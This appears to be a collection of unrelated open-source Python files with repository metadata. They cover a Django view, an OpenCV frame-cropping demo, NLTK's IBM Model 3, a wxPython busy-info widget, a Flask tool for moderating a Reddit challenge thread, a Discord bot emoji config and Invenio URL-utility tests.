def __init__(self, **kwargs):
super(ListView, self).__init__(**kwargs)
ListView.build_path = get_build_path('bcs:list', 'index.html')
template_name = 'bcs/list.html'
context_object_name = 'list'
def get_queryset(self):
""" Return the documents ordered by location name"""
return BirthCertificate.objects.order_by('location')
class DetailView(BuildableDetailView):
model = BirthCertificate
template_name = 'bcs/detail.html'
context_object_name = 'bc'
def get_url(self, obj):
return reverse('bcs:detail', kwargs={'pk': obj.pk})
|
raygeeknyc/skinner
|
frameprocessordemo.py
|
Python
|
gpl-3.0
| 3,056 | 0.017997 |
import numpy
import cv2
import time
print "Starting demo"
frameTimerDuration = 1
# This is the desired resolution of the Pi camera
resolution = (320, 240)
# This is the desired maximum framerate, 0 for maximum possible throughput
framerate = 0
# These are the dimensions of the output display; set these for your output device
displayWidth = 32.0
displayHeight = 16.0
# These are the horizontal margins of the input feed to crop, everything else scales to fit these
xLeft = 150
xRight = 150
# Open cam, decode image, show in window
cap = cv2.VideoCapture(0) # use 1 or 2 or ... for other camera
success, img = cap.read()
resolution = (len(img[0]), len(img))
print "input resolution is %d,%d" % resolution
print "target resolution is %d,%d" % (displayWidth, displayHeight)
cv2.namedWindow("Original")
cv2.namedWindow("Cropped")
cv2.namedWindow("Downsampled")
cv2.namedWindow("Equalized")
cv2.namedWindow("Contrast")
_displayAspectRatio = displayHeight / displayWidth
print "aspect ratio %f" % _displayAspectRatio
_xMin = xLeft
_xMax = resolution[0]-xRight
_width = _xMax+1 - _xMin
_height = int(_displayAspectRatio * _width)
_yMin = int((resolution[1] - _height)/2)
_yMax = _yMin + _height
print "min = %d, max = %d, height = %d" % (_yMin, _yMax, _height)
downsampleXFactor = displayWidth / _width
downsampleYFactor = displayHeight / _height
print "Crop to (%d,%d)=%d:(%d,%d)=%d" % (_xMin,_xMax,(_xMax-_xMin),_yMin,_yMax,(_yMax-_yMin))
print "Scaling by (x,y) %f, %f" % (downsampleXFactor, downsampleYFactor)
print "Scales to (%d,%d)" % (_wi
|
dth*downsampleXFactor,_height*downsampleYFactor)
def get_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
averageBrightness = int(cv2.mean(hsv[:,:,2])[0])
return bytearray(format(averageBrightness,'05d'))
def equalize_brightness(img):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv[:,:,2] = cv2.equalizeHist(hsv[:,:,2])
img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img
def equalize_hist(img):
    for c in xrange(0, 3):  # equalize all three colour channels; xrange(0, 2) skipped channel 2
img[:,:,c] = cv2.equalizeHist(img[:,:,c])
return img
frameTimer = time.time() + frameTimerDuration
frameCounter = 0
try:
key = -1
while(key < 0):
success, img = cap.read()
frameCounter += 1
if time.time() > frameTimer:
print "processed %d frames in %f seconds" % (frameCounter, frameTimerDuration)
frameCounter = 0
frameTimer = time.time() + frameTimerDuration
brightness = get_brightness(img)
print "Brightness " + brightness
cropImg = img[_yMin:_yMax,_xMin:_xMax]
smallImg = cv2.resize(cropImg, (0,0), fx=downsampleXFactor, fy=downsampleYFactor)
equalizedImg = numpy.copy(cropImg)
contrastImg = numpy.copy(cropImg)
equalize_hist(equalizedImg)
contrastImg = equalize_brightness(contrastImg)
cv2.imshow("Original", img)
cv2.imshow("Cropped", cropImg)
cv2.imshow("Downsampled", smallImg)
cv2.imshow("Equalized", equalizedImg)
cv2.imshow("Contrast", contrastImg)
key = cv2.waitKey(1)
except KeyboardInterrupt as e:
print "Interrupted"
cap.release()  # VideoCapture is released with release(), not close(); 'stream' and 'camera' were never defined here
cv2.destroyAllWindows()
|
nelango/ViralityAnalysis
|
model/lib/nltk/translate/ibm3.py
|
Python
|
mit
| 13,875 | 0.000865 |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: IBM Model 3
#
# Copyright (C) 2001-2013 NLTK Project
# Authors: Chin Yee Lee, Hengfeng Li, Ruxin Hou, Calvin Tanujaya Lim
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Translation model that considers how a word can be aligned to
multiple words in another language.
IBM Model 3 improves on Model 2 by directly modeling the phenomenon
where a word in one language may be translated into zero or more words
in another. This is expressed by the fertility probability,
n(phi | source word).
If a source word translates into more than one word, it is possible to
generate sentences that have the same alignment in multiple ways. This
is modeled by a distortion step. The distortion probability, d(j|i,l,m),
predicts a target word position, given its aligned source word's
position. The distortion probability replaces the alignment probability
of Model 2.
The fertility probability is not applicable for NULL. Target words that
align to NULL are assumed to be distributed uniformly in the target
sentence. The existence of these words is modeled by p1, the probability
that a target word produced by a real source word requires another
target word that is produced by NULL.
The EM algorithm used in Model 3 is:
E step - In the training data, collect counts, weighted by prior
probabilities.
(a) count how many times a source language word is translated
into a target language word
(b) count how many times a particular position in the target
sentence is aligned to a particular position in the source
sentence
(c) count how many times a source word is aligned to phi number
of target words
(d) count how many times NULL is aligned to a target word
M step - Estimate new probabilities based on the counts from the E step
Because there are too many possible alignments, only the most probable
ones are considered. First, the best alignment is determined using prior
probabilities. Then, a hill climbing approach is used to find other good
candidates.
Notations:
i: Position in the source sentence
Valid values are 0 (for NULL), 1, 2, ..., length of source sentence
j: Position in the target sentence
Valid values are 1, 2, ..., length of target sentence
l: Number of words in the source sentence, excluding NULL
m: Number of words in the target sentence
s: A word in the source language
t: A word in the target language
phi: Fertility, the number of target words produced by a source word
p1: Probability that a target word produced by a source word is
accompanied by another target word that is aligned to NULL
p0: 1 - p1
References:
Philipp Koehn. 2010. Statistical Machine Translation.
Cambridge University Press, New York.
Peter E Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and
Robert L. Mercer. 1993. The Mathematics of Statistical Machine
Translation: Parameter Estimation. Computational Linguistics, 19 (2),
263-311.
"""
from __future__ import division
from collections import defaultdict
from math import factorial
from nltk.translate import AlignedSent
from nltk.translate import Alignment
from nltk.translate import IBMModel
from nltk.translate import IBMModel2
from nltk.translate.ibm_model import Counts
import warnings
class IBMModel3(IBMModel):
"""
Translation model that considers how a word can be aligned to
multiple words in another language
>>> bitext = []
>>> bitext.append(AlignedSent(['klein', 'ist', 'das', 'haus'], ['the', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus', 'war', 'ja', 'groß'], ['the', 'house', 'was', 'big']))
>>> bitext.append(AlignedSent(['das', 'buch', 'ist', 'ja', 'klein'], ['the', 'book', 'is', 'small']))
>>> bitext.append(AlignedSent(['ein', 'haus', 'ist', 'klein'], ['a', 'house', 'is', 'small']))
>>> bitext.append(AlignedSent(['das', 'haus'], ['the', 'house']))
>>> bitext.append(AlignedSent(['das', 'buch'], ['the', 'book']))
>>> bitext.append(AlignedSent(['ein', 'buch'], ['a', 'book']))
>>> bitext.append(AlignedSent(['ich', 'fasse', 'das', 'buch', 'zusammen'], ['i', 'summarize', 'the', 'book']))
>>> bitext.append(AlignedSent(['fasse', 'zusammen'], ['summarize']))
>>> ibm3 = IBMModel3(bitext, 5)
>>> print(round(ibm3.translation_table['buch']['book'], 3))
1.0
>>> print(round(ibm3.translation_table['das']['book'], 3))
0.0
>>> print(round(ibm3.translation_table['ja'][None], 3))
1.0
>>> print(round(ibm3.distortion_table[1][1][2][2], 3))
1.0
>>> print(round(ibm3.distortion_table[1][2][2][2], 3))
0.0
>>> print(round(ibm3.distortion_table[2][2][4][5], 3))
0.75
>>> print(round(ibm3.fertility_table[2]['summarize'], 3))
1.0
>>> print(round(ibm3.fertility_table[1]['book'], 3))
1.0
>>> print(ibm3.p1)
0.054...
>>> test_sentence = bitext[2]
>>> test_sentence.words
['das', 'buch', 'ist', 'ja', 'klein']
>>> test_sentence.mots
['the', 'book', 'is', 'small']
>>> test_sentence.alignment
Alignment([(0, 0), (1, 1), (2, 2), (3, None), (4, 3)])
"""
def __init__(self, sentence_aligned_corpus, iterations,
probability_tables=None):
"""
Train on ``sentence_aligned_corpus`` and create a lexical
translation model, a distortion model, a fertility model, and a
model for generating NULL-aligned words.
Translation direction is from ``AlignedSent.mots`` to
``AlignedSent.words``.
:param sentence_aligned_corpus: Sentence-aligned parallel corpus
:type sentence_aligned_corpus: list(AlignedSent)
:param iterations: Number of iterations to run training algorithm
:type iterations: int
:param probability_tables: Optional. Use this to pass in custom
probability values. If not specified, probabilities will be
set to a uniform distribution, or some other sensible value.
If specified, all the following entries must be present:
``translation_table``, ``alignment_table``,
``fertility_table``, ``p1``, ``distortion_table``.
See ``IBMModel`` for the type and purpose of these tables.
:type probability_tables: dict[str]: object
"""
super(IBMModel3, self).__init__(sentence_aligned_corpus)
self.reset_probabilities()
if probability_tables is None:
# Get translation and alignment probabilities from IBM Model 2
ibm2 = IBMModel2(sentence_aligned_corpus, iterations)
self.translation_table = ibm2.translation_table
self.alignment_table = ibm2.alignment_table
self.set_uniform_probabilities(sentence_aligned_corpus)
else:
# Set user-defined probabilities
self.translation_table = probability_tables['translation_table']
self.alignment_table = probability_tables['alignment_table']
self.fertility_table = probability_tables['fertility_table']
self.p1 = probability_tables['p1']
self.distortion_table = probability_tables['distortion_table']
for n in range(0, iterations):
self.train(sentence_aligned_corpus)
def reset_probabilities(self):
super(IBMModel3, self).reset_probabilities()
self.distortion_table = defaultdict(
lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(
lambda: self.MIN_PROB))))
"""
dict[int][int][int][int]: float. Probability(j | i,l,m).
Values accessed as ``distortion_table[j][i][l][m]``.
"""
def set_uniform_probabilities(self, sentence_aligned_corpus):
# d(j | i,l,m) = 1 / m for all i, j, l, m
l_m_combinations = set()
for aligned_sentence in sentence_aligned_corpus:
l = len(aligned_sentence.mots)
m = len(aligned_sentence.words)
if (l, m) not in l_m_combinations:
l_m_combinations.add((l, m))
initial_prob = 1 / float(m)
if i
|
garrettcap/Bulletproof-Backup
|
wx/lib/agw/pybusyinfo.py
|
Python
|
gpl-2.0
| 9,862 | 0.005983 |
"""
:class:`PyBusyInfo` constructs a busy info window and displays a message in it.
Description
===========
:class:`PyBusyInfo` constructs a busy info window and displays a message in it.
This class makes it easy to tell your user that the program is temporarily busy.
Just create a :class:`PyBusyInfo` object, and within the current scope, a message window
will be shown.
For example::
busy = PyBusyInfo("Please wait, working...")
for i in xrange(10000):
DoACalculation()
del busy
It works by creating a window in the constructor, and deleting it in the destructor.
You may also want to call :func:`Yield` () to refresh the window periodically (in case
it had been obscured by other windows, for example).
Usage
=====
Usage example::
import wx
import wx.lib.agw.pybusyinfo as PBI
class MyFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, "PyBusyInfo Demo")
panel = wx.Panel(self)
b = wx.Button(panel, -1, "Test PyBusyInfo ", (50,50))
self.Bind(wx.EVT_BUTTON, self.OnButton, b)
def OnButton(self, event):
message = "Please wait 5 seconds, working..."
busy = PBI.PyBusyInfo(message, parent=self, title="Really Busy")
wx.Yield()
for indx in xrange(5):
wx.MilliSleep(1000)
del busy
# our normal wxApp-derived class, as usual
app = wx.App(0)
frame = MyFrame(None)
app.SetTopWindow(frame)
frame.Show()
app.MainLoop()
Supported Platforms
===================
:class:`PyBusyInfo` has been tested on the following platforms:
* Windows (Windows XP).
Window Styles
=============
`No particular window styles are available for this class.`
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
:class:`PyBusyInfo` is distributed under the wxPython license.
Latest Revision: Andrea Gavana @ 20 Mar 2012, 21.00 GMT
Version 0.2
"""
# Version Info
__version__ = "0.2"
import wx
_ = wx.GetTranslation
class PyInfoFrame(wx.Frame):
""" Base class for :class:`PyBusyInfo`. """
def __init__(self, parent, message, title, icon):
"""
Default class constructor.
:param `parent`: the frame parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
"""
wx.Frame.__init__(self, parent, wx.ID_ANY, title, wx.DefaultPosition,
wx.DefaultSize, wx.NO_BORDER|wx.FRAME_TOOL_WINDOW|wx.FRAME_SHAPED|wx.STAY_ON_TOP)
panel = wx.Panel(self)
panel.SetCursor(wx.HOURGLASS_CURSOR)
self._message = message
self._title = title
self._icon = icon
dc = wx.ClientDC(self)
textWidth, textHeight, dummy = dc.GetMultiLineTextExtent(self._message)
sizeText = wx.Size(textWidth, textHeight)
self.SetClientSize((max(sizeText.x, 340) + 60, max(sizeText.y, 40) + 60))
# need to size the panel correctly first so that text.Centre() works
panel.SetSize(self.GetClientSize())
# Bind the events to draw ourselves
panel.Bind(wx.EVT_PAINT, self.OnPaint)
panel.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)
self.Centre(wx.BOTH)
# Create a non-rectangular region to set the frame shape
size = self.GetSize()
bmp = wx.EmptyBitmap(size.x, size.y)
dc = wx.BufferedDC(None, bmp)
dc.SetBackground(wx.Brush(wx.Colour(0, 0, 0), wx.SOLID))
dc.Clear()
dc.SetPen(wx.Pen(wx.Colour(0, 0, 0), 1))
dc.DrawRoundedRectangle(0, 0, size.x, size.y, 12)
r = wx.RegionFromBitmapColour(bmp, wx.Colour(0, 0, 0))
# Store the non-rectangular region
self.reg = r
if wx.Platform == "__WXGTK__":
self.Bind(wx.EVT_WINDOW_CREATE, self.SetBusyShape)
else:
self.SetBusyShape()
# Add a custom bitmap at the top (if any)
def SetBusyShape(self, event=None):
"""
Sets :class:`PyInfoFrame` shape using the region created from the bitmap.
:param `event`: a :class:`WindowCreateEvent` event (GTK only, as GTK supports setting
the window shape only during window creation).
"""
self.SetShape(self.reg)
if event:
# GTK only
event.Skip()
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`PaintEvent` to be processed.
"""
panel = event.GetEventObject()
dc = wx.BufferedPaintDC(panel)
dc.Clear()
# Fill the background with a gradient shading
startColour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_ACTIVECAPTION)
endColour = wx.WHITE
rect = panel.GetRect()
dc.GradientFillLinear(rect, startColour, endColour, wx.SOUTH)
# Draw the label
font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc.SetFont(font)
# Draw the message
rect2 = wx.Rect(*rect)
rect2.height += 20
dc.DrawLabel(self._message, rect2, alignment=wx.ALIGN_CENTER|wx.ALIGN_CENTER)
# Draw the top title
font.SetWeight(wx.BOLD)
dc.SetFont(font)
dc.SetPen(wx.Pen(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT)))
dc.SetTextForeground(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT))
if self._icon.IsOk():
iconWidth, iconHeight = self._icon.GetWidth(), self._icon.GetHeight()
dummy, textHeight = dc.GetTextExtent(self._title)
textXPos, textYPos = iconWidth + 10, (iconHeight-textHeight)/2
dc.DrawBitmap(self._icon, 5, 5, True)
else:
textXPos, textYPos = 5, 0
dc.DrawText(self._title, textXPos, textYPos+5)
dc.DrawLine(5, 25, rect.width-5, 25)
size = self.GetSize()
dc.SetPen(wx.Pen(startColour, 1))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRoundedRectangle(0, 0, size.x, size.y-1, 12)
def OnErase(self, event):
"""
Handles the ``wx.EVT_ERASE_BACKGROUND`` event for :class:`PyInfoFrame`.
:param `event`: a :class:`EraseEvent` event to be processed.
:note: This method is intentionally empty to reduce flicker.
"""
# This is empty on purpose, to avoid flickering
pass
# -------------------------------------------------------------------- #
# The actual PyBusyInfo implementation
# -------------------------------------------------------------------- #
class PyBusyInfo(object):
"""
Constructs a busy info window as child of parent and displays a message in it.
"""
def __init__(self, message, parent=None, title=_("Busy"), icon=wx.NullBitmap):
"""
Default class constructor.
:param `parent`: the :class:`PyBusyInfo` parent;
:param `message`: the message to display in the :class:`PyBusyInfo`;
:param `title`: the main :class:`PyBusyInfo` title;
:param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`.
:note: If `parent` is not ``None`` you must ensure that it is not closed
while the busy info is shown.
"""
self._infoFrame = PyInfoFrame(parent, message, title, icon)
if parent and parent.HasFlag(wx.STAY_ON_TOP):
# we must have this flag to be in front of our parent if it has it
self._infoFrame.SetWindowStyleFlag(wx.STAY_ON_TOP)
# Added for the screenshot-taking tool
self.Show()
def __del__(self):
""" Overloaded method, for compatibility with wxWidgets. """
self._infoFrame.Show(False)
self._infoFrame.Destroy()
|
HugoGuillen/nb2py
|
tutorial_files/custom.py
|
Python
|
mit
| 70 | 0.057143 |
#This is a cell with a custom comment as marker
x=10
y
|
=11
print
|
(x+y)
|
foobarbazblarg/stayclean
|
stayclean-2017-may/serve-challenge-with-flask.py
|
Python
|
mit
| 10,823 | 0.003326 |
#!/usr/bin/python
# TODO: issues with new oauth2 stuff. Keep using older version of Python for now.
# #!/usr/bin/env python
import subprocess
import praw
import datetime
import pyperclip
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection
reload(sys)
sys.setdefaultencoding('utf8')
# Edit Me!
challengePageSubmissionId = '68lss2'
flaskport = 8891
thisMonthName = "May"
nextMonthName = "June"
readAllCommentsWhichCanBeSlower = False
sorryTooLateToSignUpReplyText = "Sorry, but the late signup grace period for " + thisMonthName + " is over, so you can't officially join this challenge. But feel free to follow along anyway, and comment all you want. And be sure to join us for the " + nextMonthName + " challenge. Signup posts for " + nextMonthName + " will begin during the last week of " + thisMonthName + "."
reinstatedReplyText = "OK, I've reinstated you. You should start showing up on the list again starting tomorrow."
app = Flask(__name__)
app.debug = True
commentHashesAndComments = {}
submission = None
def loginAndReturnRedditSession():
config = ConfigParser()
config.read("../reddit-password-credentials.cfg")
user = config.get("Reddit", "user")
password = config.get("Reddit", "password")
# TODO: password auth is going away, and we will soon need to do oauth.
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
redditSession.login(user, password, disable_warning=True)
# submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5)
# print [str(x) for x in submissions]
return redditSession
def loginOAuthAndReturnRedditSession():
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg")
# TODO: Testing comment of refresh. We authenticate fresh every time, so presumably no need to do o.refresh().
# o.refresh(force=True)
return redditSession
def getSubmissionForRedditSession(redditSession):
submission = redditSession.get_submission(submission_id=challengePageSubmissionId)
if readAllCommentsWhichCanBeSlower:
submission.replace_more_comments(limit=None, threshold=0)
return submission
def getCommentsForSubmission(submission):
return [comment for comment in praw.helpers.flatten_tree(submission.comments) if comment.__class__ == praw.objects.Comment]
def retireCommentHash(commentHash):
with open("retiredcommenthashes.txt", "a") as commentHashFile:
commentHashFile.write(commentHash + '\n')
def retiredCommentHashes():
with open("retiredcommenthashes.txt", "r") as commentHashFile:
# return commentHashFile.readlines()
return commentHashFile.read().splitlines()
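# Each comment is identified by sha1(permalink + body); once a comment has
# been moderated, its hash is appended to retiredcommenthashes.txt so that
# the moderation page skips it on the next render (see the loop below).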
@app.route('/moderatechallenge.html')
def moderatechallenge():
currentDayOfMonthIndex = datetime.date.today().day
lateCheckinGracePeriodIsInEffect = currentDayOfMonthIndex <= 3
global commentHashesAndComments
global submission
commentHashesAndComments = {}
stringio = StringIO()
stringio.write('<html>\n<head>\n</head>\n\n')
# redditSession = loginAndReturnRedditSession()
redditSession = loginOAuthAndReturnRedditSession()
submission = getSubmissionForRedditSession(redditSession)
flat_comments = getCommentsForSubmission(submission)
retiredHashes = retiredCommentHashes()
i = 1
stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
stringio.write("<h3>")
stringio.write(os.getcwd())
stringio.write("<br>\n")
stringio.write(submission.title)
stringio.write("</h3>\n\n")
stringio.write('<form action="copydisplaytoclipboard.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" name="actiontotake" value="Copy disp
|
lay.py stdout to clipboard">')
stringio.write('<input type="submit" name="actiontotake" value="Automatically post display.py stdout">')
    stringio.write('</form>')
stringio.write('<form action="updategooglechart.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" value="update-google-chart.py">')
stringio.write('</form>')
for comment in flat_comments:
# print comment.is_root
# print comment.score
i += 1
commentHash = sha1()
commentHash.update(comment.permalink)
commentHash.update(comment.body.encode('utf-8'))
commentHash = commentHash.hexdigest()
if commentHash not in retiredHashes:
commentHashesAndComments[commentHash] = comment
authorName = str(comment.author) # can be None if author was deleted. So check for that and skip if it's None.
participant = ParticipantCollection().participantNamed(authorName)
stringio.write("<hr>\n")
stringio.write('<font color="blue"><b>')
stringio.write(authorName)
stringio.write('</b></font><br>')
if ParticipantCollection().hasParticipantNamed(authorName):
stringio.write(' <small><font color="green">(member)</font></small>')
if participant.isStillIn:
stringio.write(' <small><font color="green">(still in)</font></small>')
else:
stringio.write(' <small><font color="red">(out)</font></small>')
if participant.hasCheckedIn:
stringio.write(' <small><font color="green">(checked in)</font></small>')
else:
stringio.write(' <small><font color="orange">(not checked in)</font></small>')
if participant.hasRelapsed:
stringio.write(' <small><font color="red">(relapsed)</font></small>')
else:
stringio.write(' <small><font color="green">(not relapsed)</font></small>')
else:
stringio.write(' <small><font color="red">(not a member)</font></small>')
stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
if lateCheckinGracePeriodIsInEffect:
stringio.write('<input type="submit" name="actiontotake" value="Checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin" style="color:white;background-color:green">')
else:
stringio.write('<input type="submit" name="actiontotake" value="Checkin" style="color:white;background-color:green">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Relapse" style="color:white;background-color:red">')
stringio.write('<input type="submit" name="actiontotake" value="Reinstate with automatic comment">')
stringio.write('<input type="submit" name="actiontotake" value="Reply with sorry-too-late comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
stringio.write('</form>')
stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
stringio.write("\n<br><br>\n\n")
stringio.write('</html>')
pageString = stringio.getvalue()
stringio.close()
return Response(pageString, mimetype='text/html')
@app.rout
|
Ikusaba-san/Chiaki-Nanami
|
emojistemplate.py
|
Python
|
mit
| 2,702 | 0.00037 |
"""Config file for the emojis that Chiaki will use.
RENAME THIS FILE TO emojis.py OTHERWISE IT WON'T WORK.
By default it uses the unicode emojis. However, you can specify
server emojis in one of the two possible ways:
1. The raw string of the emoji. This is the format <:name:id>. You can find this
by placing a backslash before the emoji.
2. The ID of the emoji. This must be an integer. And can be shown through the
same method.
Note that bots have "nitro" status when it comes to emojis. So as long as
it's in the server that has the custom emoji, the bot can use it on any other
server it's in.
"""
# ------- Confirmation emojis (for Context.ask_confirmation) -------
# Confirm option
confirm = '\N{WHITE HEAVY CHECK MARK}'
# Deny Option
deny = '\N{CROSS MARK}'
# ------- Status emojis (for various info commands) ----------------
online = '\N{GREEN HEART}'
idle = '\N{YELLOW HEART}'
dnd = '\N{HEAVY BLACK HEART}'
offline = '\N{BLACK HEART}'
streaming = '\N{PURPLE HEART}'
bot_tag = '\N{ROBOT FACE}'
# ------- Currency Emoji -------------
money = '\N{BANKNOTE WITH DOLLAR SIGN}'
# ------ Numbers -----
# Right now it uses the default key-caps
# However, you may specify custom emojis if needed
#
# Note: The numbers are what *Discord sees them as*. Technically the
# actual keycap number emoji would be {number}\ufe0f\u20e3. But discord
# instead sends it as {number}\u20e3 (without the \ufe0f). Do not add the
# \fe0f in, otherwise it won't send as an actual number.
numbers = [
f'{n}\u20e3' for n in range(10)
]
# ------- Minesweeper -------
# Not an emoji per se but set to True if you want to be able to use external
# emojis for Minesweeper. This only applies to Minesweeper as this changes
# the control scheme if she's able to use external emojis.
#
# Note that if Chiaki doesn't have Use External Emojis she'll be forced to
# use the default control scheme by default.
msw_use_external_emojis = False
msw_y_row = [
# Should have emojis representing 1-17.
# If you set msw_use_external_emojis to True this *must* be filled.
]
msw_letters = [
# Should have emojis representing A-Q or some equivalent.
# If you set msw_use_external_emojis to True this *must* be filled.
]
# ------ Connect-Four -------
c4_winning_tiles = [
'\N{HEAVY BLACK HEART}',
'\N{BLUE HEART}'
]
# ------- Sudoku ------
sudoku_clues = [
f'{n}\u20e3' for n in range(1, 9)
]
# ------- Checkers -------
checkers_black_king = '\N{HEAVY BLACK HEART}'
checkers_white_king = '\N{BLUE HEART}'
checkers_black_last_move = ''
checkers_white_last_move = ''
# -------- Shards ---------
shard_connecting = ''
shard_online = ''
shard_disconnecting = ''
shard_offline = ''
|
jmartinm/invenio
|
modules/miscutil/lib/urlutils_unit_tests.py
|
Python
|
gpl-2.0
| 18,616 | 0.004835 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for the urlutils library."""
__revision__ = "$Id$"
from invenio.testutils import InvenioTestCase
from cgi import parse_qs
from invenio.config import CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite
from invenio.urlutils import (create_AWS_request_url,
string_to_numeric_char_reference,
make_canonical_urlargd,
create_html_link,
create_html_mailto,
same_urls_p,
HASHLIB_IMPORTED,
wash_url_argument,
create_url,
create_Indico_request_url,
get_relative_url)
class TestWashUrlArgument(InvenioTestCase):
def test_wash_url_argument(self):
"""urlutils - washing of URL arguments"""
self.assertEqual(1,
wash_url_argument(['1'], 'int'))
self.assertEqual("1",
wash_url_argument(['1'], 'str'))
self.assertEqual(['1'],
wash_url_argument(['1'], 'list'))
        self.assertEqual(0,
wash_url_argument('ellis', 'int'))
self.assertEqual("ellis",
wash_url_argument('ellis', 'str'))
self.assertEqual(["ellis
|
"],
wash_url_argument('ellis', 'list'))
self.assertEqual(0,
wash_url_argument(['ellis'], 'int'))
self.assertEqual("ellis",
wash_url_argument(['ellis'], 'str'))
self.assertEqual(["ellis"],
wash_url_argument(['ellis'], 'list'))
class TestUrls(InvenioTestCase):
"""Tests on URLs"""
def test_url_creation(self):
"""urlutils - test url creation"""
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=True),
'http://www.a.com/search?of=hb%26&recid=3')
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=False),
'http://www.a.com/search?of=hb&&recid=3')
def test_canonical_urlargd_creation(self):
"""urlutils - test creation of canonical URLs"""
self.assertEqual(make_canonical_urlargd({'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?&'},
{'a': ('int', 1),
'b': ('str', 2)}),
"?b%26=2%3D&%3A=%3F%26&b=2")
if HASHLIB_IMPORTED:
def test_signed_aws_request_creation(self):
"""urlutils - test creation of signed AWS requests"""
signed_aws_request_url = create_AWS_request_url("http://webservices.amazon.com/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Service': 'AWSECommerceService',
'Operation': 'ItemLookup',
'ItemId': '0679722769',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews',
'Version': '2009-01-06'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
        # Are we at least accessing the correct base URL?
self.assert_(signed_aws_request_url.startswith("http://webservices.amazon.com/onca/xml"))
# Check that parameters with special characters (, :) get correctly
# encoded/decoded
## Note: using parse_qs() url-decodes the string
self.assertEqual(parse_qs(signed_aws_request_url)["ResponseGroup"],
['ItemAttributes,Offers,Images,Reviews'])
self.assert_('ItemAttributes%2COffers%2CImages%2CReviews' \
in signed_aws_request_url)
self.assertEqual(parse_qs(signed_aws_request_url)["Timestamp"],
['2009-01-01T12:00:00Z'])
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url)["Signature"],
['Nace+U3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg='])
self.assert_('Nace%2BU3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg%3D&Operation' \
in signed_aws_request_url)
        # Continue with an additional request
signed_aws_request_url_2 = \
create_AWS_request_url("http://ecs.amazonaws.co.uk/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Actor': 'Johnny Depp',
'AssociateTag': 'mytag-20',
'Operation': 'ItemSearch',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews,Variations',
'SearchIndex': 'DVD',
'Service': 'AWSECommerceService',
'Sort': 'salesrank',
'Version': '2009-01-01'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url_2)["Signature"],
['TuM6E5L9u/uNqOX09ET03BXVmHLVFfJIna5cxXuHxiU='])
def test_signed_Indico_request_creation(self):
"""urlutils - test creation of signed Indico requests"""
signed_Indico_request_url = create_Indico_request_url("https://indico.cern.ch",
"categ",
"",
[1, 7],
"xml",
{'onlypublic': 'yes',
